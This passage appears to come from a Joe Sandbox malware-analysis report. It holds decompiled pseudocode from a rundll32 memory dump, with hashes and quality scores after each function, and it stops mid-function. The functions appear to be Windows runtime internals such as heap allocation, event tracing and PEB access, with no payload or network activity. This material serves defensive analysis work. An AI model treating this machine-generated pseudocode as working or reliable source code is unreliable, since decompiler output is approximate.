                                                                                            				_t2 = _t61 + 0x20; // 0x20
                                                                                            				E04609ED0(_t2, 1, 0);
                                                                                            				_t52 =  *(_t61 + 0x8c);
                                                                                            				_t4 = _t61 + 0x8c; // 0x8c
                                                                                            				_t40 = _t4;
                                                                                            				do {
                                                                                            					_t44 = _t52;
                                                                                            					_t58 = _t52 & 0x00000001;
                                                                                            					_t24 = _t44;
                                                                                            					asm("lock cmpxchg [ebx], edx");
                                                                                            					_t52 = _t44;
                                                                                            				} while (_t52 != _t44);
                                                                                            				if(_t58 == 0) {
                                                                                            					L7:
                                                                                            					_pop(_t59);
                                                                                            					_pop(_t62);
                                                                                            					_pop(_t41);
                                                                                            					return E0461B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                                                            				}
                                                                                            				asm("lock xadd [esi], eax");
                                                                                            				_t47 =  *[fs:0x18];
                                                                                            				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                                                            				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                                                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                            				if(_t30 != 0) {
                                                                                            					if( *_t30 == 0) {
                                                                                            						goto L4;
                                                                                            					}
                                                                                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            					L5:
                                                                                            					if( *_t31 != 0) {
                                                                                            						_t18 = _t61 + 0x78; // 0x78
                                                                                            						E046A8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                                                            					}
                                                                                            					_t52 =  *(_t61 + 0x5c);
                                                                                            					_t11 = _t61 + 0x78; // 0x78
                                                                                            					_t34 = E04609702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                                                            					_t24 = _t34 | 0xffffffff;
                                                                                            					asm("lock xadd [esi], eax");
                                                                                            					if((_t34 | 0xffffffff) == 0) {
                                                                                            						 *0x46cb1e0(_t61);
                                                                                            						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                                                            					}
                                                                                            					goto L7;
                                                                                            				}
                                                                                            				L4:
                                                                                            				_t31 = 0x7ffe0386;
                                                                                            				goto L5;
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f58c8ace1e3e2d0376151f86e31a838407b85fd6dd432822008606a055ed1c2c
                                                                                            • Instruction ID: cae088536e047385be808dc4490fe7a5927ed63fdcb097fefd8a3dcf783eb45b
                                                                                            • Opcode Fuzzy Hash: f58c8ace1e3e2d0376151f86e31a838407b85fd6dd432822008606a055ed1c2c
                                                                                            • Instruction Fuzzy Hash: E9317C31601A448FD725CF28D844B5AB3E5FF88B18F18456DE99687B91EB35BC01DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 77%
                                                                                            			E04656C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                                                            				signed short* _v8;
                                                                                            				signed char _v12;
                                                                                            				void* _t22;
                                                                                            				signed char* _t23;
                                                                                            				intOrPtr _t24;
                                                                                            				signed short* _t44;
                                                                                            				void* _t47;
                                                                                            				signed char* _t56;
                                                                                            				signed char* _t58;
                                                                                            
                                                                                            				_t48 = __ecx;
                                                                                            				_push(__ecx);
                                                                                            				_push(__ecx);
                                                                                            				_t44 = __ecx;
                                                                                            				_v12 = __edx;
                                                                                            				_v8 = __ecx;
                                                                                            				_t22 = E045F7D50();
                                                                                            				_t58 = 0x7ffe0384;
                                                                                            				if(_t22 == 0) {
                                                                                            					_t23 = 0x7ffe0384;
                                                                                            				} else {
                                                                                            					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            				}
                                                                                            				if( *_t23 != 0) {
                                                                                            					_t24 =  *0x46c7b9c; // 0x0
                                                                                            					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                                                            					_t23 = L045F4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                                                            					_t56 = _t23;
                                                                                            					if(_t56 != 0) {
                                                                                            						_t56[0x24] = _a4;
                                                                                            						_t56[0x28] = _a8;
                                                                                            						_t56[6] = 0x1420;
                                                                                            						_t56[0x20] = _v12;
                                                                                            						_t14 =  &(_t56[0x2c]); // 0x2c
                                                                                            						E0461F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                                                            						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                                                            						if(E045F7D50() != 0) {
                                                                                            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            						}
                                                                                            						_push(_t56);
                                                                                            						_push(_t47 - 0x20);
                                                                                            						_push(0x402);
                                                                                            						_push( *_t58 & 0x000000ff);
                                                                                            						E04619AE0();
                                                                                            						_t23 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                                                            					}
                                                                                            				}
                                                                                            				return _t23;
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7abf767da6c66bd9df77e9590bed86fa81a1f80757f82f648ab6106b34fea33f
                                                                                            • Instruction ID: 0c1674396db6f35ca3beaffd4cc064f8af1133f17d7b167c2a400faa4385b787
                                                                                            • Opcode Fuzzy Hash: 7abf767da6c66bd9df77e9590bed86fa81a1f80757f82f648ab6106b34fea33f
                                                                                            • Instruction Fuzzy Hash: BB21BAB1A00645AFD715DF68D880F6AB7B8FF48704F14006AF908CB7A1E634ED10CBA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 82%
                                                                                            			E046190AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                                                            				intOrPtr* _v0;
                                                                                            				void* _v8;
                                                                                            				signed int _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				char _v36;
                                                                                            				void* _t38;
                                                                                            				intOrPtr _t41;
                                                                                            				void* _t44;
                                                                                            				signed int _t45;
                                                                                            				intOrPtr* _t49;
                                                                                            				signed int _t57;
                                                                                            				signed int _t58;
                                                                                            				intOrPtr* _t59;
                                                                                            				void* _t62;
                                                                                            				void* _t63;
                                                                                            				void* _t65;
                                                                                            				void* _t66;
                                                                                            				signed int _t69;
                                                                                            				intOrPtr* _t70;
                                                                                            				void* _t71;
                                                                                            				intOrPtr* _t72;
                                                                                            				intOrPtr* _t73;
                                                                                            				char _t74;
                                                                                            
                                                                                            				_t65 = __edx;
                                                                                            				_t57 = _a4;
                                                                                            				_t32 = __ecx;
                                                                                            				_v8 = __edx;
                                                                                            				_t3 = _t32 + 0x14c; // 0x14c
                                                                                            				_t70 = _t3;
                                                                                            				_v16 = __ecx;
                                                                                            				_t72 =  *_t70;
                                                                                            				while(_t72 != _t70) {
                                                                                            					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                                                            						L24:
                                                                                            						_t72 =  *_t72;
                                                                                            						continue;
                                                                                            					}
                                                                                            					_t30 = _t72 + 0x10; // 0x10
                                                                                            					if(E0462D4F0(_t30, _t65, _t57) == _t57) {
                                                                                            						return 0xb7;
                                                                                            					}
                                                                                            					_t65 = _v8;
                                                                                            					goto L24;
                                                                                            				}
                                                                                            				_t61 = _t57;
                                                                                            				_push( &_v12);
                                                                                            				_t66 = 0x10;
                                                                                            				if(E0460E5E0(_t57, _t66) < 0) {
                                                                                            					return 0x216;
                                                                                            				}
                                                                                            				_t73 = L045F4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                                                            				if(_t73 == 0) {
                                                                                            					_t38 = 0xe;
                                                                                            					return _t38;
                                                                                            				}
                                                                                            				_t9 = _t73 + 0x10; // 0x10
                                                                                            				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                                                            				E0461F3E0(_t9, _v8, _t57);
                                                                                            				_t41 =  *_t70;
                                                                                            				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                                                            					_t62 = 3;
                                                                                            					asm("int 0x29");
                                                                                            					_push(_t62);
                                                                                            					_push(_t57);
                                                                                            					_push(_t73);
                                                                                            					_push(_t70);
                                                                                            					_t71 = _t62;
                                                                                            					_t74 = 0;
                                                                                            					_v36 = 0;
                                                                                            					_t63 = E0460A2F0(_t62, _t71, 1, 6,  &_v36);
                                                                                            					if(_t63 == 0) {
                                                                                            						L20:
                                                                                            						_t44 = 0x57;
                                                                                            						return _t44;
                                                                                            					}
                                                                                            					_t45 = _v12;
                                                                                            					_t58 = 0x1c;
                                                                                            					if(_t45 < _t58) {
                                                                                            						goto L20;
                                                                                            					}
                                                                                            					_t69 = _t45 / _t58;
                                                                                            					if(_t69 == 0) {
                                                                                            						L19:
                                                                                            						return 0xe8;
                                                                                            					}
                                                                                            					_t59 = _v0;
                                                                                            					do {
                                                                                            						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                                                            							goto L18;
                                                                                            						}
                                                                                            						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                                                            						 *_t59 = _t49;
                                                                                            						if( *_t49 != 0x53445352) {
                                                                                            							goto L18;
                                                                                            						}
                                                                                            						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                                                            						return 0;
                                                                                            						L18:
                                                                                            						_t63 = _t63 + 0x1c;
                                                                                            						_t74 = _t74 + 1;
                                                                                            					} while (_t74 < _t69);
                                                                                            					goto L19;
                                                                                            				}
                                                                                            				 *_t73 = _t41;
                                                                                            				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                                                            				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                                                            				 *_t70 = _t73;
                                                                                            				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                                                            				return 0;
                                                                                            			}



























                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                            • Instruction ID: d4e94b6012b7bebd9dd0c286489d6a2dca88e7fac9930e2f06adac1739bb5a26
                                                                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                            • Instruction Fuzzy Hash: 182171B1A00305EFDB20DF55C845A9AF7F8EB54314F14886AE94597360E330FD44CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 59%
                                                                                            			E04603B7A(void* __ecx) {
                                                                                            				signed int _v8;
                                                                                            				char _v12;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _t17;
                                                                                            				intOrPtr _t26;
                                                                                            				void* _t35;
                                                                                            				void* _t38;
                                                                                            				void* _t41;
                                                                                            				intOrPtr _t44;
                                                                                            
                                                                                            				_t17 =  *0x46c84c4; // 0x0
                                                                                            				_v12 = 1;
                                                                                            				_v8 =  *0x46c84c0 * 0x4c;
                                                                                            				_t41 = __ecx;
                                                                                            				_t35 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x46c84c0 * 0x4c);
                                                                                            				if(_t35 == 0) {
                                                                                            					_t44 = 0xc0000017;
                                                                                            				} else {
                                                                                            					_push( &_v8);
                                                                                            					_push(_v8);
                                                                                            					_push(_t35);
                                                                                            					_push(4);
                                                                                            					_push( &_v12);
                                                                                            					_push(0x6b);
                                                                                            					_t44 = E0461AA90();
                                                                                            					_v20 = _t44;
                                                                                            					if(_t44 >= 0) {
                                                                                            						E0461FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x46c84c0 * 0xc);
                                                                                            						_t38 = _t35;
                                                                                            						if(_t35 < _v8 + _t35) {
                                                                                            							do {
                                                                                            								asm("movsd");
                                                                                            								asm("movsd");
                                                                                            								asm("movsd");
                                                                                            								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                                                            							} while (_t38 < _v8 + _t35);
                                                                                            							_t44 = _v20;
                                                                                            						}
                                                                                            					}
                                                                                            					_t26 =  *0x46c84c4; // 0x0
                                                                                            					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                                                            				}
                                                                                            				return _t44;
                                                                                            			}













                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • Opcode ID: 27852c29ae371215fab0b40ab92ad814a95caa7b8400a81fcb91d051e6380e7b
                                                                                            • Instruction ID: 84a7c4dfa02ed06b6ad875cb890f62b708cc35ea7abdbcf586c23105595ba90f
                                                                                            • Opcode Fuzzy Hash: 27852c29ae371215fab0b40ab92ad814a95caa7b8400a81fcb91d051e6380e7b
                                                                                            • Instruction Fuzzy Hash: E721B0B2600104AFD714EF58CD81B6AB7BDFB44309F154068EA08AB251E375BD55DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 80%
                                                                                            			E04656CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                                                            				char _v8;
                                                                                            				char _v12;
                                                                                            				char _v16;
                                                                                            				char _v20;
                                                                                            				char _v28;
                                                                                            				char _v36;
                                                                                            				char _v52;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				signed char* _t21;
                                                                                            				void* _t24;
                                                                                            				void* _t36;
                                                                                            				void* _t38;
                                                                                            				void* _t46;
                                                                                            
                                                                                            				_push(_t36);
                                                                                            				_t46 = __edx;
                                                                                            				_v12 = 0;
                                                                                            				_v8 = 0;
                                                                                            				_v20 = 0;
                                                                                            				_v16 = 0;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t21 = 0x7ffe0384;
                                                                                            				} else {
                                                                                            					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                            				}
                                                                                            				if( *_t21 != 0) {
                                                                                            					_t21 =  *[fs:0x30];
                                                                                            					if((_t21[0x240] & 0x00000004) != 0) {
                                                                                            						if(E045F7D50() == 0) {
                                                                                            							_t21 = 0x7ffe0385;
                                                                                            						} else {
                                                                                            							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                            						}
                                                                                            						if(( *_t21 & 0x00000020) != 0) {
                                                                                            							_t56 = _t46;
                                                                                            							if(_t46 == 0) {
                                                                                            								_t46 = 0x45b5c80;
                                                                                            							}
                                                                                            							_push(_t46);
                                                                                            							_push( &_v12);
                                                                                            							_t24 = E0460F6E0(_t36, 0, _t46, _t56);
                                                                                            							_push(_a4);
                                                                                            							_t38 = _t24;
                                                                                            							_push( &_v28);
                                                                                            							_t21 = E0460F6E0(_t38, 0, _t46, _t56);
                                                                                            							if(_t38 != 0) {
                                                                                            								if(_t21 != 0) {
                                                                                            									E04657016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                                                            									L045F2400( &_v52);
                                                                                            								}
                                                                                            								_t21 = L045F2400( &_v28);
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            				return _t21;
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 265f601ef841886c629dba886a13f073a4958b5fd8a091ce1b2f088acb3ec82e
                                                                                            • Instruction ID: 6a836c4028d41051cbcd1567f28efa23879e1a8e741527ae280815f335ee8455
                                                                                            • Opcode Fuzzy Hash: 265f601ef841886c629dba886a13f073a4958b5fd8a091ce1b2f088acb3ec82e
                                                                                            • Instruction Fuzzy Hash: 9721F2725002459BE721DF28C944B6BB7ECAF91744F440A5BFD44C7260F734E909C6A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 67%
                                                                                            			E046A070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                            				char _v8;
                                                                                            				intOrPtr _v11;
                                                                                            				signed int _v12;
                                                                                            				intOrPtr _v15;
                                                                                            				signed int _v16;
                                                                                            				intOrPtr _v28;
                                                                                            				void* __ebx;
                                                                                            				char* _t32;
                                                                                            				signed int* _t38;
                                                                                            				signed int _t60;
                                                                                            
                                                                                            				_t38 = __ecx;
                                                                                            				_v16 = __edx;
                                                                                            				_t60 = E046A07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                                                            				if(_t60 != 0) {
                                                                                            					_t7 = _t38 + 0x38; // 0x29cd5903
                                                                                            					_push( *_t7);
                                                                                            					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                                                            					_push( *_t9);
                                                                                            					_v12 = _a8 << 0xc;
                                                                                            					_t11 = _t38 + 4; // 0x5de58b5b
                                                                                            					_push(0x4000);
                                                                                            					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                                                            					E0469AFDE( &_v8,  &_v12);
                                                                                            					E046A1293(_t38, _v28, _t60);
                                                                                            					if(E045F7D50() == 0) {
                                                                                            						_t32 = 0x7ffe0380;
                                                                                            					} else {
                                                                                            						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                            					}
                                                                                            					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                            						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                                                            						E046914FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                                                            					}
                                                                                            				}
                                                                                            				return  ~_t60;
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                            • Instruction ID: ee52448bb3605f866e843a8903e757e4c8b62a2a3649cff703724941c88c6405
                                                                                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                            • Instruction Fuzzy Hash: 6521F236204600AFD715DF18C880BAABBE5EBD4754F04856DF9958B381E730ED19CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 96%
                                                                                            			E045FAE73(intOrPtr __ecx, void* __edx) {
                                                                                            				intOrPtr _v8;
                                                                                            				void* _t19;
                                                                                            				char* _t22;
                                                                                            				signed char* _t24;
                                                                                            				intOrPtr _t25;
                                                                                            				intOrPtr _t27;
                                                                                            				void* _t31;
                                                                                            				intOrPtr _t36;
                                                                                            				char* _t38;
                                                                                            				signed char* _t42;
                                                                                            
                                                                                            				_push(__ecx);
                                                                                            				_t31 = __edx;
                                                                                            				_v8 = __ecx;
                                                                                            				_t19 = E045F7D50();
                                                                                            				_t38 = 0x7ffe0384;
                                                                                            				if(_t19 != 0) {
                                                                                            					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            				} else {
                                                                                            					_t22 = 0x7ffe0384;
                                                                                            				}
                                                                                            				_t42 = 0x7ffe0385;
                                                                                            				if( *_t22 != 0) {
                                                                                            					if(E045F7D50() == 0) {
                                                                                            						_t24 = 0x7ffe0385;
                                                                                            					} else {
                                                                                            						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                            					}
                                                                                            					if(( *_t24 & 0x00000010) != 0) {
                                                                                            						goto L17;
                                                                                            					} else {
                                                                                            						goto L3;
                                                                                            					}
                                                                                            				} else {
                                                                                            					L3:
                                                                                            					_t27 = E045F7D50();
                                                                                            					if(_t27 != 0) {
                                                                                            						_t27 =  *[fs:0x30];
                                                                                            						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                                                            					}
                                                                                            					if( *_t38 != 0) {
                                                                                            						_t27 =  *[fs:0x30];
                                                                                            						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                                                            							goto L5;
                                                                                            						}
                                                                                            						_t27 = E045F7D50();
                                                                                            						if(_t27 != 0) {
                                                                                            							_t27 =  *[fs:0x30];
                                                                                            							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                                                            						}
                                                                                            						if(( *_t42 & 0x00000020) != 0) {
                                                                                            							L17:
                                                                                            							_t25 = _v8;
                                                                                            							_t36 = 0;
                                                                                            							if(_t25 != 0) {
                                                                                            								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                                                            							}
                                                                                            							_t27 = E04657794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                                                            						}
                                                                                            						goto L5;
                                                                                            					} else {
                                                                                            						L5:
                                                                                            						return _t27;
                                                                                            					}
                                                                                            				}
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                            • Instruction ID: 437f42a73740f92db2bedb66b2e891ee255c57138e4aeac68ec1bd3c98fa3379
                                                                                            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                            • Instruction Fuzzy Hash: 7521C2317016819FEF159B29C954B2577E9BF94784F2900E1EE088B7A2F734FC40D692
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 82%
                                                                                            			E04657794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                            				intOrPtr _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				intOrPtr _t21;
                                                                                            				void* _t24;
                                                                                            				intOrPtr _t25;
                                                                                            				void* _t36;
                                                                                            				short _t39;
                                                                                            				signed char* _t42;
                                                                                            				unsigned int _t46;
                                                                                            				void* _t50;
                                                                                            
                                                                                            				_push(__ecx);
                                                                                            				_push(__ecx);
                                                                                            				_t21 =  *0x46c7b9c; // 0x0
                                                                                            				_t46 = _a8;
                                                                                            				_v12 = __edx;
                                                                                            				_v8 = __ecx;
                                                                                            				_t4 = _t46 + 0x2e; // 0x2e
                                                                                            				_t36 = _t4;
                                                                                            				_t24 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                                                            				_t50 = _t24;
                                                                                            				if(_t50 != 0) {
                                                                                            					_t25 = _a4;
                                                                                            					if(_t25 == 5) {
                                                                                            						L3:
                                                                                            						_t39 = 0x14b1;
                                                                                            					} else {
                                                                                            						_t39 = 0x14b0;
                                                                                            						if(_t25 == 6) {
                                                                                            							goto L3;
                                                                                            						}
                                                                                            					}
                                                                                            					 *((short*)(_t50 + 6)) = _t39;
                                                                                            					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                                                            					_t11 = _t50 + 0x2c; // 0x2c
                                                                                            					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                                                            					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                                                            					E0461F3E0(_t11, _a12, _t46);
                                                                                            					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                                                            					if(E045F7D50() == 0) {
                                                                                            						_t42 = 0x7ffe0384;
                                                                                            					} else {
                                                                                            						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            					}
                                                                                            					_push(_t50);
                                                                                            					_t19 = _t36 - 0x20; // 0xe
                                                                                            					_push(0x403);
                                                                                            					_push( *_t42 & 0x000000ff);
                                                                                            					E04619AE0();
                                                                                            					_t24 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                                                            				}
                                                                                            				return _t24;
                                                                                            			}














                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 54556d9fbd117860605c0c39706bae18166845f77cb763cd6cb8537228786297
                                                                                            • Instruction ID: b20af549477abb22dbe07c041dcbec3cf6240c8e0e3ebf08461c0a5f9171cd0d
                                                                                            • Opcode Fuzzy Hash: 54556d9fbd117860605c0c39706bae18166845f77cb763cd6cb8537228786297
                                                                                            • Instruction Fuzzy Hash: 72216F72500604ABC725DF69DC90EABB7A9EF88741F14456DEA0AD7760E634E900CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 93%
                                                                                            			E0460FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                            				intOrPtr _v8;
                                                                                            				void* _t19;
                                                                                            				intOrPtr _t29;
                                                                                            				intOrPtr _t32;
                                                                                            				intOrPtr _t35;
                                                                                            				intOrPtr _t37;
                                                                                            				intOrPtr* _t40;
                                                                                            
                                                                                            				_t35 = __edx;
                                                                                            				_push(__ecx);
                                                                                            				_push(__ecx);
                                                                                            				_t37 = 0;
                                                                                            				_v8 = __edx;
                                                                                            				_t29 = __ecx;
                                                                                            				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                                                            					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                                                            					L3:
                                                                                            					_t19 = _a4 - 4;
                                                                                            					if(_t19 != 0) {
                                                                                            						if(_t19 != 1) {
                                                                                            							L7:
